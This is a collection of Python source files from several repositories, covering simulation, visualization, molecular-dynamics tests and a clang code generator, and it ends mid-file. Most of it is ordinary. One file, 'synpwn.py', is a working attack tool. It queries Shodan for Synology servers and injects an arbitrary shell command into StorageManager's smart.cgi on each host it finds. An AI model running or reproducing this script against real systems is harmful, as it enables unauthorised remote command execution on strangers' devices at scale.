time[float]: The time at which the data should be returned.
"""
# Update the time
if time is not None:
self._time = time
# Update the time data file
self._timedata.update()
# The list of files from the supplied pattern
last_modified = 0.0
for fname in sorted(glob.glob(self._pattern)):
if fname.endswith('LATEST') or fname.endswith('FINAL') or (fname == self._timedata.filename):
continue
idx = self._timeHelper(fname)
mdf = self._frames.get(idx, None)
if mdf is None:
mdf = MooseDataFrame(fname, run_start_time=self._run_start_time, update=False,
peacock_index=True)
self._frames[idx] = mdf
# Clean up old and empty data
for idx in list(self._frames.keys()):
mdf = self._frames[idx]
mdf.update()
if mdf.empty():
self._frames.pop(idx)
elif (mdf.modified < last_modified):
self._frames.pop(idx)
elif mdf.filesize == 0:
self._frames.pop(idx)
else:
last_modified = mdf.modified
self.__updateCurrentIndex()
def repr(self):
"""
Return components for building script.
Returns:
(output, imports) The necessary script and include statements to re-create data load.
"""
imports = ['import mooseutils']
output = ['\n# Read VectorPostprocessor Data']
output += ['data = mooseutils.VectorPostprocessorReader({})'.format(repr(self._pattern))]
return output, imports
def _timeHelper(self, filename):
"""
Determine the time index. (protected)
"""
idx = filename.rfind('_') + 1
tstep = int(filename[idx:-4])
if not self._timedata:
return tstep
else:
try:
return self._timedata['time'].loc[tstep]
except Exception:
return tstep
def __updateCurrentIndex(self):
"""
Helper for setting the current key for the supplied time.
"""
if not self._frames:
index = None
# Return the latest time
elif self._time == -1:
index = self.times()[-1]
# Return the specified time
elif self._time in self._frames:
index = self._time
# Find nearest time
else:
times = self.times()
n = len(times)
idx = bisect.bisect_right(times, self._time) - 1
if idx < 0:
idx = 0
elif idx > n:
idx = -1
index = times[idx]
self._index = index
|
harterj/moose
|
python/mooseutils/VectorPostprocessorReader.py
|
Python
|
lgpl-2.1
| 5,970
|
[
"MOOSE"
] |
ac4caabd3ea0a5a58dcf7019b6491539f991dd74cecafe428a8c0cccd663f327
|
#!/usr/bin/env python
disk = vtk.vtkDiskSource()
disk.SetRadialResolution(2)
disk.SetCircumferentialResolution(9)
clean = vtk.vtkCleanPolyData()
clean.SetInputConnection(disk.GetOutputPort())
clean.SetTolerance(0.01)
piece = vtk.vtkExtractPolyDataPiece()
piece.SetInputConnection(clean.GetOutputPort())
extrude = vtk.vtkPLinearExtrusionFilter()
extrude.SetInputConnection(piece.GetOutputPort())
extrude.PieceInvariantOn()
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(extrude.GetOutputPort())
mapper.SetNumberOfPieces(2)
mapper.SetPiece(1)
bf = vtk.vtkProperty()
bf.SetColor(1,0,0)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(1,1,0.8)
actor.SetBackfaceProperty(bf)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(actor)
ren1.SetBackground(0.1,0.2,0.4)
renWin.SetSize(300,300)
# render the image
#
cam1 = ren1.GetActiveCamera()
cam1.Azimuth(20)
cam1.Elevation(40)
ren1.ResetCamera()
cam1.Zoom(1.2)
iren.Initialize()
# prevent the tk window from showing up then start the event loop
# --- end of script --
|
ashray/VTK-EVM
|
Filters/Parallel/Testing/Python/TestExtrudePiece.py
|
Python
|
bsd-3-clause
| 1,283
|
[
"VTK"
] |
e31861d713b994880af03c49fbc13b2f7de2a1caecf954cdcf2803915345b4d3
|
# Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" Visualization of shape-based constraints with test particles.
"""
from __future__ import print_function
from threading import Thread
import numpy as np
import espressomd
import espressomd.shapes
import espressomd.visualization_opengl
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)
box_l = 50
system = espressomd.System(box_l=[50.0] * 3)
system.set_random_state_PRNG()
np.random.seed(seed=system.seed)
system.time_step = 0.0001
system.cell_system.skin = 0.3
visualizer = espressomd.visualization_opengl.openGLLive(
system, background_color=[1, 1, 1], drag_enabled=True, rasterize_resolution=50.0,
rasterize_pointsize=5, camera_position=[150, 25, 25], camera_right=[0, 0, -1])
# Wall
# system.constraints.add(shape=espressomd.shapes.Wall(dist=20, normal=[0.1, 0.0, 1]),
# particle_type=0, penetrable=True)
# Sphere
# system.constraints.add(shape=espressomd.shapes.Sphere(center=[25, 25, 25], radius=15,
# direction=1), particle_type=0, penetrable=True)
# Ellipsoid
# system.constraints.add(shape=espressomd.shapes.Ellipsoid(center=[25, 25, 25], a=25, b=15,
# direction=1), particle_type=0, penetrable=True)
# Cylinder
# system.constraints.add(shape=espressomd.shapes.Cylinder(center=[25, 25, 25], axis=[1, 0,
# 0], direction=1, radius=10, length=30), particle_type=0,
# penetrable=True)
# SpheroCylinder
# system.constraints.add(shape=espressomd.shapes.SpheroCylinder(center=[25, 25, 25],
# axis=[1, 0, 0], direction=1, radius=10, length=30), particle_type=0,
# penetrable=True)
# Maze
# system.constraints.add(shape=espressomd.shapes.Maze(cylrad=3, dim=2, nsphere=2, sphrad=8),
# particle_type=0, penetrable=True)
# Stomatocyte
# system.constraints.add(shape=espressomd.shapes.Stomatocyte(inner_radius=3, outer_radius=7,
# axis=[1.0, 0.0, 0.0], center=[25, 25, 25], layer_width=3, direction=1),
# particle_type=0, penetrable=True)
# SimplePore
system.constraints.add(shape=espressomd.shapes.SimplePore(center=[25, 25, 25], axis=[
1, 0, 0], length=15, radius=12.5, smoothing_radius=2), particle_type=0, penetrable=True)
# Slitpore
# system.constraints.add(shape=espressomd.shapes.Slitpore(channel_width=15,
# lower_smoothing_radius=3, upper_smoothing_radius=3, pore_length=20,
# pore_mouth=30, pore_width=5), particle_type=0, penetrable=True)
# HollowCone
# system.constraints.add(shape=espressomd.shapes.HollowCone(inner_radius=5, outer_radius=20,
# opening_angle=np.pi/4.0, axis=[1.0, 0.0, 0.0], center=[25, 25, 25],
# width=2, direction=1), particle_type=0, penetrable=True)
system.thermostat.set_langevin(kT=10.0, gamma=10)
for i in range(100):
rpos = np.random.random(3) * box_l
system.part.add(pos=rpos, type=1)
system.non_bonded_inter[1, 1].lennard_jones.set_params(
epsilon=1.0, sigma=5.0,
cutoff=15.0, shift="auto")
system.non_bonded_inter[0, 1].lennard_jones.set_params(
epsilon=200.0, sigma=5.0,
cutoff=20.0, shift="auto")
system.force_cap = 1000.0
visualizer.run(1)
|
hmenke/espresso
|
samples/visualization_constraints.py
|
Python
|
gpl-3.0
| 3,725
|
[
"ESPResSo"
] |
6cd381761483cb51878463040f277c17a864e3f7f8f438304faa4246dab8d8bf
|
from ddapp import objectmodel as om
from ddapp import affordanceitems
from ddapp import lcmobjectcollection
from ddapp import visualization as vis
from ddapp.timercallback import TimerCallback
from ddapp.uuidutil import newUUID
from ddapp import vtkAll as vtk
from ddapp.thirdparty import numpyjsoncoder
import traceback
class AffordanceObjectModelManager(object):
def __init__(self, view):
self.collection = lcmobjectcollection.LCMObjectCollection(channel='AFFORDANCE_COLLECTION_COMMAND')
self.collection.connectDescriptionUpdated(self._onDescriptionUpdated)
self.collection.connectDescriptionRemoved(self._onDescriptionRemoved)
self.view = view
self.notifyFrequency = 30 # throttle lcm messages per second sent for affordance updates
self._ignoreChanges = False
self._pendingUpdates = set()
self.timer = TimerCallback()
self.timer.callback = self._notifyPendingUpdates
self.affordanceUpdater = None
def setAffordanceUpdater(self, affordanceUpdater):
self.affordanceUpdater = affordanceUpdater
def getAffordances(self):
return [obj for obj in om.getObjects() if isinstance(obj, affordanceitems.AffordanceItem)]
def getCollisionAffordances(self):
affs = []
for aff in self.getAffordances():
if aff.getProperty('Collision Enabled'):
affs.append(aff)
return affs
def getAffordanceId(self, aff):
return aff.getProperty('uuid')
def newAffordanceFromDescription(self, desc):
if 'uuid' not in desc:
desc['uuid'] = newUUID()
self.collection.updateDescription(desc)
return self.getAffordanceById(desc['uuid'])
def getAffordanceById(self, affordanceId):
for aff in self.getAffordances():
if self.getAffordanceId(aff) == affordanceId:
return aff
def getAffordanceDescription(self, aff):
return aff.getDescription()
def registerAffordance(self, aff, notify=True):
aff.connectRemovedFromObjectModel(self._onAffordanceRemovedFromObjectModel)
aff.properties.connectPropertyChanged(self._onAffordancePropertyChanged)
aff.getChildFrame().connectFrameModified(self._onAffordanceFrameChanged)
if notify:
self.notifyAffordanceUpdate(aff)
def removeAffordance(self, aff):
self.collection.removeDescription(aff.getProperty('uuid'), notify=False)
def notifyAffordanceUpdate(self, aff):
if not isinstance(aff, affordanceitems.AffordanceItem):
return
shouldNotify = not self._pendingUpdates and not self.timer.singleShotTimer.isActive()
self._pendingUpdates.add(aff)
if shouldNotify:
self._notifyPendingUpdates()
def _notifyPendingUpdates(self):
if self._pendingUpdates:
self.timer.singleShot(1.0/self.notifyFrequency)
for aff in self._pendingUpdates:
try:
self.collection.updateDescription(self.getAffordanceDescription(aff), notify=False)
except:
print traceback.format_exc()
self._pendingUpdates.clear()
def _onAffordancePropertyChanged(self, propertySet, propertyName):
if self._ignoreChanges:
return
self.notifyAffordanceUpdate(self.getAffordanceById(propertySet.getProperty('uuid')))
def _onAffordanceFrameChanged(self, frameObj):
if self._ignoreChanges:
return
aff = frameObj.parent()
self.notifyAffordanceUpdate(aff)
def _onAffordanceRemovedFromObjectModel(self, objectModel, aff):
if self._ignoreChanges:
return
self.removeAffordance(aff)
def _loadAffordanceFromDescription(self, desc):
className = desc['classname']
cls = getattr(affordanceitems, className)
aff = cls(desc['Name'], self.view)
om.addToObjectModel(aff, parentObj=om.getOrCreateContainer('affordances'))
vis.addChildFrame(aff)
aff.loadDescription(desc, copyMode=aff.COPY_MODE_ALL)
self.registerAffordance(aff, notify=False)
def _onDescriptionUpdated(self, collection, descriptionId):
aff = self.getAffordanceById(descriptionId)
desc = collection.getDescription(descriptionId)
if aff:
self._ignoreChanges = True
aff.loadDescription(desc, copyMode=aff.COPY_MODE_SKIP_LOCAL)
self._ignoreChanges = False
else:
aff = self._loadAffordanceFromDescription(desc)
def _onDescriptionRemoved(self, collection, descriptionId):
self._ignoreChanges = True
om.removeFromObjectModel(self.getAffordanceById(descriptionId))
self._ignoreChanges = False
|
gizatt/director
|
src/python/ddapp/affordancemanager.py
|
Python
|
bsd-3-clause
| 4,772
|
[
"VTK"
] |
156b6fad8da5542ef8768009b0a4b58e52bcc1dd798e35227d85d45059ddb2a6
|
#!/usr/bin/env python3
# Author: LukeBob
#
# Requires: argparse, shodan, requests pip install them if needed.
# Run with: python3 synPwn.py --key <Shodan API Key> --cmd "<Command to try and execute>"
#
# python3 script for testing the (Synology StorageManager 5.2 - Root Remote Command Execution) exploit found by, (Weibo: SecuriTeam_SSD Twitter: @SecuriTeam_SSD)
# Uses the shodan library to find the targets running synology and runs specified command given in --cmd param
# use, "python3 synpwn.py" -h ,for more help
# For more information on the exploit visit: https://www.exploit-db.com/exploits/43190/
#
# Note THIS SCRIPT CAN GET YOU IN ALOT OF TROUBLE, PROBABLY NOT WORTH THE HASTLE, ANYTHING YOU DO WITH THIS SCRIPT IS ON YOU'R BEHALF,
# AND YOUR'S ALONE!
#
# READ ^^^
import requests
import argparse
import shodan
parser = argparse.ArgumentParser(description="SynPwn, run remote code on Servers running 'Synology StorageManager 5.2'", epilog='Author: (Lukebob)')
parser.add_argument("--key", help='Shodan key')
parser.add_argument("--cmd", help='Command to run on system, if spaces in command wrap the command in quotes')
args = parser.parse_args()
## cloulors
class Color():
@staticmethod
def red(str):
return("\033[91m" + str + "\033[0m")
@staticmethod
def green(str):
return("\033[92m" + str + "\033[0m")
@staticmethod
def yellow(str):
return("\033[93m" + str + "\033[0m")
@staticmethod
def blue(str):
return("\033[94m" + str + "\033[0m")
## Creates New Shodan Api Object
def make_api(key):
try:
if len(key) > 1:
api = shodan.Shodan(key)
api.info()
else:
print(Color.red("[+] Error:")+" Please enter valid Api Key")
except shodan.exception.APIError as e:
print('[+] Error: %s' % e)
exit(0)
return(api)
## try's to run command on the target
def exploit(target):
try:
url = ("http://{0}/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda'{1}''".format(target, args.cmd))
r=requests.get(url)
stat = r.status_code
return(stat)
except Exception as e:
print(Color.red("[+] Error: ")+" {0}".format(e))
pass
## itterates through targets printing vulnerable/invulnerable ip,hostname,countryname
def search(api):
try:
results = api.search("Synology port:80")
except shodan.APIError as e:
print(Color.red("[+] Error: ")+"{0}".format(e))
exit(0)
for result in results['matches']:
country = result['location']['country_name']
hostname = result['hostnames']
target = result['ip_str']
result = exploit(target)
if result == "200":
print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, Color.red(args.cmd), Color.green("Vulnerable")))
elif result != "200":
print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, Color.red(args.cmd), Color.red("Not Vulnerable")))
def main():
if args.cmd and args.key:
api = make_api(args.key)
search(api)
else:
parser.print_help()
if __name__ == '__main__':
main()
|
LukeBob/bobstools-py
|
synpwn.py
|
Python
|
mit
| 3,694
|
[
"VisIt"
] |
a3cd57c23ded6be2a406b8d0095d8a23d38695539ca914da6006b1d16d0d372d
|
"""
Compute saddle-point integrals over trajectories traveling on adiabataic
potentials
This currently uses first-order saddle point.
"""
import numpy as np
import nomad.math.constants as constants
import nomad.core.glbl as glbl
import nomad.compiled.nuclear_gaussian_ccs as nuclear
# Let propagator know if we need data at centroids to propagate
require_centroids = False
# Determines the Hamiltonian symmetry
hermitian = True
# returns basis in which matrix elements are evaluated
basis = 'gaussian'
#cache previous values of theta, ensure continuity
theta_cache = dict()
# this is mostly to allow for consistent conventions: which
# diabat is the "excited" state, which is "ground" state.
gs = 0
es = 1
def elec_overlap(traj1, traj2):
"""Returns < Psi | Psi' >, the electronic overlap integral of two trajectories"""
return complex( np.dot(phi(traj1),phi(traj2)), 0.)
def nuc_overlap(traj1, traj2):
"""Returns < chi| chi' >, the nuclear overlap integral of two trajectories"""
return nuclear.overlap(traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
def traj_overlap(traj1, traj2):
"""Returns < chi| chi' >, the nuclear overlap integral of two trajectories"""
return elec_overlap(traj1, traj2) * nuc_overlap(traj1, traj2)
def s_integral(traj1, traj2, nuc_ovrlp, elec_ovrlp):
"""Returns < Psi | Psi' >, the overlap of the nuclear
component of the wave function only"""
return nuc_ovrlp * elec_ovrlp
def t_integral(traj1, traj2, kecoef, nuc_ovrlp, elec_ovrlp):
"""Returns kinetic energy integral over trajectories."""
# evaluate just the nuclear component (for re-use)
# < chi | del^2 / dx^2 | chi'>
ke = nuclear.deld2x(nuc_ovrlp,traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
return -np.dot(kecoef,ke) * elec_ovrlp
def sdot_integral(traj1, traj2, nuc_ovrlp, elec_ovrlp):
"""Returns kinetic energy integral over trajectories."""
# evaluate just the nuclear component (for re-use)
# < chi | d / dx | chi'>
deldx = nuclear.deldx(nuc_ovrlp,traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
# < chi | d / dp | chi'>
deldp = nuclear.deldp(nuc_ovrlp,traj1.widths(),traj1.x(),traj1.p(),
traj2.widths(),traj2.x(),traj2.p())
# the nuclear contribution to the sdot matrix
sdot = ( np.dot(deldx, traj2.velocity())
+ np.dot(deldp, traj2.force())) * elec_ovrlp
phi1 = phi(traj1)
dphi2 = dphi(traj2)
# the derivative coupling
deriv_coup = np.array([np.dot(phi1, dphi2[:,q]) for q in range(traj2.dim)])
e_coup = np.dot(deriv_coup, traj2.velocity()) * nuc_ovrlp
return sdot + e_coup
def rot_mat(theta):
"""Returns the adiabatic-diabatic rotation matrix for a given value of
theta"""
global gs, es
if gs == 0:
return np.array([[ np.cos(theta), -np.sin(theta)],
[ np.sin(theta), np.cos(theta)]])
else:
return np.array([[-np.sin(theta), np.cos(theta)],
[ np.cos(theta), np.sin(theta)]])
def drot_mat(theta):
"""Returns the derivative adiabatic-diabatic rotation matrix with respect
to theta"""
global gs, es
if gs == 0:
return np.array([[-np.sin(theta), -np.cos(theta)],
[ np.cos(theta), -np.sin(theta)]])
else:
return np.array([[-np.cos(theta), -np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
def theta(traj):
"""Returns to the adiabatic-diabatic rotation angle theta.
Choose theta to be consistent with diabatic-adiabatic transformation
matrix, which itself is chosen to have a phase resulting in a slowly
varying value of of theta.
"""
global theta_cache, gs, es
# can also run the trivial case of a single state
if traj.nstates == 1:
return 0.
hmat = traj.pes.get_data('diabat_pot')
h12 = hmat[0,1]
de = hmat[es,es]-hmat[gs,gs]
if abs(de) < constants.fpzero:
sgn = np.sign(de)
if sgn == 0.:
sgn = 1
de = sgn * constants.fpzero
ang = 0.5*np.arctan2(2.*h12,de)
# check the cached value and shift if necessary.
pi_mult = [0,-1.,1.]
# if not in cache, return current value
if traj.label in theta_cache:
dif_vec = [abs(ang + pi_mult[i]*np.pi - theta_cache[traj.label])
for i in range(len(pi_mult))]
shft = dif_vec.index(min(dif_vec))
if shft != 0:
ang += pi_mult[shft]*np.pi
theta_cache[traj.label] = ang
#print("traj="+str(traj.label)+" theta="+str(ang)+"\n")
return ang
def dtheta(traj):
"""Returns to the derivative adiabatic-diabatic rotation angle theta with
respect to the internal coordinates."""
global gs, es
# can also run the trivial case of a single state
if traj.nstates == 1:
return np.zeros((traj.dim), dtype=float)
hmat = traj.pes.get_data('diabat_pot')
dhmat = traj.pes.get_data('diabat_deriv')
h12 = hmat[0,1]
de = hmat[es,es] - hmat[gs,gs]
if abs(de) < constants.fpzero:
sgn = np.sign(de)
if sgn == 0.:
sgn = 1
de = sgn * constants.fpzero
arg = 2. * h12 / de
if abs(arg) < constants.fpzero:
sgn = np.sign(arg)
if sgn == 0.:
sgn = 1
arg = sgn * constants.fpzero
dtheta_dq = np.array([((dhmat[q,0,1]*de - h12*(dhmat[q,es,es]-dhmat[q,gs,gs]))/de**2)/(1+arg**2)
for q in range(traj.dim)])
return dtheta_dq
def phi(traj):
"""Returns the transformation matrix using the rotation angle.
Should be indentical to the dat_mat in the vibronic interface"""
# can also run the trivial case of a single state
if traj.nstates == 1:
return np.array([1.], dtype=float)
angle = theta(traj)
phi_mat = rot_mat(angle)
return phi_mat[:,traj.state]
def dphi(traj):
"""Returns the derivative transformation matrix using the rotation angle."""
# can also run the trivial case of a single state
if traj.nstates == 1:
return np.zeros(traj.dim, dtype=float)
angle = theta(traj)
dangle = dtheta(traj)
dphi_mat = drot_mat(angle)
dphi_dq = np.array([dphi_mat[i,traj.state]*dangle for i in range(traj.nstates)])
return dphi_dq
|
mschuurman/FMSpy
|
nomad/integrals/mca.py
|
Python
|
lgpl-3.0
| 6,533
|
[
"Gaussian"
] |
c021577aae4f94e8f9f2db48769fdf0d8ac43ab9aee9942844c719313910331d
|
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import mdtraj as md
import numpy as np
from mdtraj.geometry.alignment import rmsd_qcp, compute_average_structure
from mdtraj.testing import eq
np.random.seed(52)
def test_trajectory_rmsd(get_fn):
t = md.load(get_fn('traj.h5'))
for parallel in [True, False]:
calculated = md.rmsd(t, t, 0, parallel=parallel)
reference = np.zeros(t.n_frames)
for i in range(t.n_frames):
reference[i] = rmsd_qcp(t.xyz[0], t.xyz[i])
eq(calculated, reference, decimal=3)
def test_precentered_1(get_fn):
# test rmsd against the numpy version, using the same trajectory
# as target and reference
t1 = md.load(get_fn('traj.h5'), stride=10)
t2 = md.load(get_fn('traj.h5'), stride=10)
# don't center t1, and use it without precentered
# explicitly center t2, and use *with* precentered
for parallel in [True, False]:
t2.center_coordinates()
eq(t1.n_frames, t2.n_frames)
for i in range(t1.n_frames):
ref = np.zeros(t1.n_frames)
for j in range(t1.n_frames):
ref[j] = rmsd_qcp(t1.xyz[j], t1.xyz[i])
val1 = md.rmsd(t1, t1, i, parallel=parallel, precentered=False)
val2 = md.rmsd(t2, t2, i, parallel=parallel, precentered=True)
eq(ref, val1, decimal=3)
eq(val1, val2)
def test_precentered_2(get_fn):
# test rmsd against the numpy version, using the difference
# trajectories as target and reference
t1_a = md.load(get_fn('traj.h5'), stride=10)
t2_a = md.load(get_fn('traj.h5'), stride=10)
t1_b = md.load(get_fn('traj.h5'), stride=10)
t2_b = md.load(get_fn('traj.h5'), stride=10)
# don't center t1, and use it without precentered
# explicitly center t2, and use *with* precentered
t2_a.center_coordinates()
t2_b.center_coordinates()
for parallel in [True, False]:
for i in range(t1_b.n_frames):
ref = np.zeros(t1_a.n_frames)
for j in range(t1_a.n_frames):
ref[j] = rmsd_qcp(t1_a.xyz[j], t1_b.xyz[i])
val1 = md.rmsd(t1_a, t1_b, i, parallel=parallel, precentered=False)
val2 = md.rmsd(t2_a, t2_b, i, parallel=parallel, precentered=True)
eq(ref, val1, decimal=3)
eq(val1, val2, decimal=4)
def test_superpose_0(get_fn):
t1 = md.load(get_fn('traj.h5'))
reference_rmsd = md.rmsd(t1, t1, 0)
t1.superpose(t1, 0)
displ_rmsd = np.zeros(t1.n_frames)
for i in range(t1.n_frames):
delta = t1.xyz[i] - t1.xyz[0]
displ_rmsd[i] = (delta ** 2.0).sum(1).mean() ** 0.5
eq(reference_rmsd, displ_rmsd, decimal=5)
def test_superpose_1():
# make one frame far from the origin
reference = md.Trajectory(xyz=np.random.randn(1, 100, 3) + 100, topology=None)
reference_xyz = reference.xyz.copy()
for indices in [None, np.arange(90)]:
# make another trajectory in a similar rotational state
query = md.Trajectory(xyz=reference.xyz + 0.01 * np.random.randn(*reference.xyz.shape), topology=None)
query.superpose(reference, 0, atom_indices=indices)
assert eq(reference.xyz, reference_xyz)
new_centers = np.mean(query.xyz[0], axis=1)
assert 80 < new_centers[0] < 120
assert 80 < new_centers[1] < 120
assert 80 < new_centers[2] < 120
def test_superpose_2():
t1 = md.Trajectory(xyz=np.random.randn(1, 100, 3) + 100, topology=None)
t2 = md.Trajectory(xyz=np.random.randn(1, 100, 3) + 100, topology=None)
t2_copy = t2.xyz.copy()
t1.superpose(t2)
t1.superpose(t2, atom_indices=[1, 2, 3, 4, 5, 6, 7])
# make sure that superposing doesn't alter the reference traj
eq(t2.xyz, t2_copy)
def test_superpose_refinds():
# make one frame far from the origin
normal = np.random.randn(1, 100, 3)
normal_xyz = normal.copy()
flipped = np.zeros_like(normal)
flipped[:, :50, :] = normal[:, 50:, :]
flipped[:, 50:, :] = normal[:, :50, :]
flipped_xyz = flipped.copy()
normal = md.Trajectory(xyz=normal, topology=None)
flipped = md.Trajectory(xyz=flipped, topology=None)
normal.superpose(flipped, atom_indices=np.arange(0, 50), ref_atom_indices=np.arange(50, 100))
eq(normal.xyz, normal_xyz)
flipped.superpose(normal, atom_indices=np.arange(50, 100), ref_atom_indices=np.arange(0, 50))
eq(flipped.xyz, flipped_xyz)
normal.superpose(flipped)
assert not np.allclose(normal.xyz, normal_xyz)
def test_rmsd_atom_indices(get_fn):
native = md.load(get_fn('native.pdb'))
t1 = md.load(get_fn('traj.h5'))
atom_indices = np.arange(10)
dist1 = md.rmsd(t1, native, atom_indices=atom_indices)
t2 = md.load(get_fn('traj.h5'))
t2.restrict_atoms(atom_indices)
native.restrict_atoms(atom_indices)
dist2 = md.rmsd(t2, native)
eq(dist1, dist2)
def test_rmsd_ref_ainds(get_fn):
native = md.load(get_fn('native.pdb'))
t1 = md.load(get_fn('traj.h5'))
atom_indices = np.arange(10)
dist1 = md.rmsd(t1, native, atom_indices=atom_indices,
ref_atom_indices=atom_indices)
bad_atom_indices = np.arange(10, 20)
t2 = md.load(get_fn('traj.h5'))
dist2 = md.rmsd(t2, native, atom_indices=atom_indices,
ref_atom_indices=bad_atom_indices)
assert np.all(dist2 > dist1)
def test_average_structure(get_fn):
traj = md.load(get_fn('frame0.dcd'), top=get_fn('frame0.pdb'))
average = compute_average_structure(traj.xyz)
# The mean RMSD to the average structure should be less than to any individual frame.
sum1 = 0
sum2 = 0
for i in range(traj.n_frames):
sum1 += rmsd_qcp(traj.xyz[0], traj.xyz[i])
sum2 += rmsd_qcp(average, traj.xyz[i])
assert sum2 < sum1
|
leeping/mdtraj
|
tests/test_rmsd.py
|
Python
|
lgpl-2.1
| 6,778
|
[
"MDTraj"
] |
0d84fef93e5ea6c2a903a316d855bf097d7f0072dacaffdd96fc5760e78cc3ed
|
#!/usr/bin/env python
import clang
from clang.cindex import Index
import argparse
import os
import re
import sys
indent_spaces = 4
indentation = ' ' * indent_spaces
output = ['']
class client_data:
def __init__(self):
self.tu = None
self.current_namespaces = [] # cursors
self.current_struct = null_cursor
self.current_struct_prefix = ''
# function signature, forwarding call arguments, optional return
# keyword, function name, and "const"/"" for function constness
self.member_functions = [] # each element [''] * 5
self.printed_headers = False
self.filename = ''
self.include_guarded = False
self.form = ''
self.form_lines = []
self.headers = ''
self.copy_on_write = False
def get_tokens (tu, cursor):
return [x for x in tu.get_tokens(extent=cursor.extent)]
def print_tokens (tu, cursor, tokens_from_include_directive):
tokens = get_tokens(tu, cursor)
open_angle = '<'
open_angle_seen = False
for token in tokens:
spelling = token.spelling
if not open_angle_seen:
output[0] += ' '
output[0] += spelling
if token == open_angle:
open_angle_seen = True
output[0] += '\n'
def struct_kind (kind):
if kind == clang.cindex.CursorKind.CLASS_DECL or \
kind == clang.cindex.CursorKind.STRUCT_DECL or \
kind == clang.cindex.CursorKind.CLASS_TEMPLATE or \
kind == clang.cindex.CursorKind.CLASS_TEMPLATE_PARTIAL_SPECIALIZATION:
return True
else:
return False
def indent (offset=0):
size = len(data.current_namespaces) + offset
return ' ' * (size * indent_spaces)
def print_lines (lines):
for line in lines:
if line != '':
output[0] += indent() + indentation + lines[i] + '\n'
else:
output[0] += '\n'
def print_headers ():
if data.printed_headers:
return
output[0] += data.headers + '\n'
data.printed_headers = True
def struct_prefix (struct_cursor):
retval = ''
tokens = get_tokens(data.tu, struct_cursor)
open_brace = '{'
struct_ = 'struct'
class_ = 'class'
for i in range(len(tokens)):
spelling = tokens[i].spelling
if spelling == open_brace:
break
if spelling == struct_ or spelling == class_:
retval += '\n' + indent(-1)
elif i:
retval += ' '
retval += spelling
return retval
def member_params (cursor):
tokens = get_tokens(data.tu, cursor)
open_brace = '{'
semicolon = ';'
close_paren = ')'
const_token = 'const'
comma = ','
str = ''
constness = ''
identifier_regex = re.compile(r'[_a-zA-Z][_a-zA-Z0-9]*')
probably_args = []
close_paren_seen = False
for i in range(len(tokens)):
spelling = tokens[i].spelling
if identifier_regex.match(spelling) and i < len(tokens) - 1 and (tokens[i + 1].spelling == comma or tokens[i + 1].spelling == close_paren):
probably_args.append(spelling)
if close_paren_seen and spelling == const_token:
constness = 'const'
if spelling == close_paren:
close_paren_seen = True
if spelling == open_brace or spelling == semicolon:
break
if i:
str += ' '
str += spelling
args = [x for x in cursor.get_arguments()]
args_str = ''
function_name = cursor.spelling
for i in range(len(args)):
arg_cursor = args[i]
# Sometimes, libclang gets confused. When it does, try our best to
# figure out the parameter names anyway.
if arg_cursor.spelling == '':
args_str = ', '.join(probably_args)
os.write(2,
'''An error has occurred in determining the name of parameter {} of function
{}. This usually occurs when libclang can't figure out the type of the
parameter (often due to a typo or missing include somewhere). We're using
these possibly-wrong, heuristically-determined parameter names instead:
'{}'.\n'''.format(i, function_name, args_str))
break
if i:
args_str += ', '
args_str += arg_cursor.spelling
return_str = cursor.result_type.kind != clang.cindex.TypeKind.VOID and 'return ' or ''
return [str, args_str, return_str, function_name, constness]
def indent_lines (lines):
regex = re.compile(r'\n')
indentation = indent()
return regex.sub('\n' + indentation, indentation + lines)
def find_expansion_lines (lines):
retval = [0] * 3
for i in range(len(lines)):
line = lines[i]
try:
nonvirtual_pos = line.index('{nonvirtual_members}')
except:
nonvirtual_pos = -1
try:
pure_virtual_pos = line.index('{pure_virtual_members}')
except:
pure_virtual_pos = -1
try:
virtual_pos = line.index('{virtual_members}')
except:
virtual_pos = -1
if nonvirtual_pos != -1:
retval[0] = (i, nonvirtual_pos)
elif pure_virtual_pos != -1:
retval[1] = (i, pure_virtual_pos)
elif virtual_pos != -1:
retval[2] = (i, virtual_pos)
return retval
def close_struct ():
lines = data.form_lines
expansion_lines = find_expansion_lines(lines)
lines = map(
lambda line: line.format(
struct_prefix=data.current_struct_prefix,
struct_name=data.current_struct.spelling,
nonvirtual_members='{nonvirtual_members}',
